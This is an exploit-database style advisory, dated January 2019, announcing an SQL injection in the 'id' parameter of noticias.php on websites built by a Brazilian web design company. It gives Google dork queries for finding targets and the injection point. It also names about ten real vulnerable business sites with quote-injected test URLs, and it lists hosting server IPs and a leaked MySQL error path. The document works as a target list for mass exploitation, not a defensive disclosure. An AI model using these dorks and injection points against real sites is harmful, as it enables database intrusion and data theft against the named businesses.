facebook facebook twitter rss

Criação sitesrapidos.com.br Web Design Brazil SQL Injection

Author: KingSkrupellos , Published: 18-01-2019
##############################################################

# Exploit Title : Criação sitesrapidos.com.br Web Design Brazil SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 16/01/2019
# Vendor Homepage : sitesrapidos.com.br
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''criação: sitesrapidos.com.br''
criação: sitesrapidos.com.br inurl:/noticias.php?id=
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

##############################################################

# SQL Injection Exploit :
***********************
/noticias.php?id=[SQL Injection]

##############################################################

# Example Vulnerable Sites :
*************************

[+] sidermetal.com.br/noticias.php?id=3%27 =>

[ Proof of Concept for SQL Inj ] => archive.is/46g98

[+] bockrs.com.br/noticias.php?id=3%27

[+] sanderagropecuaria.com.br/noticias.php?id=3%27

[+] alcancyassessoria.com.br/noticias.php?id=4%27

[+] garagetec.com.br/noticias.php?id=68%27

[+] ferragemlampiao.com.br/noticias.php?id=1%27

[+] marcelokuhn.com.br/noticias.php?id=1%27

[+] genialrs.com.br/noticias.php?id=4%27

[+] btiseguros.com.br/noticias.php?id=70%27

[+] correspondentecaixars.com.br/noticias.php?id=5%27

Note : (63.247.92.74) => There are 31 domains hosted on this server.

Note : (192.185.170.138) => There are 159 domains hosted on this server.

Note : (187.45.193.229) => There are 549 domains hosted on this server.

Note : (187.45.210.66) => There are 95 domains hosted on this server.

Note : (192.185.170.14) => There are 60 domains hosted on this server.

Note : (192.185.31.71) => There are 194 domains hosted on this server.

##############################################################

# SQL Database Error :
**********************

Warning: mysql_fetch_array(): supplied argument is not a valid
MySQL result resource in /home/httpd/vhosts
/sanderagropecuaria.com.br/httpdocs/noticias.php on line 42

##############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

##############################################################

Like us on Facebook :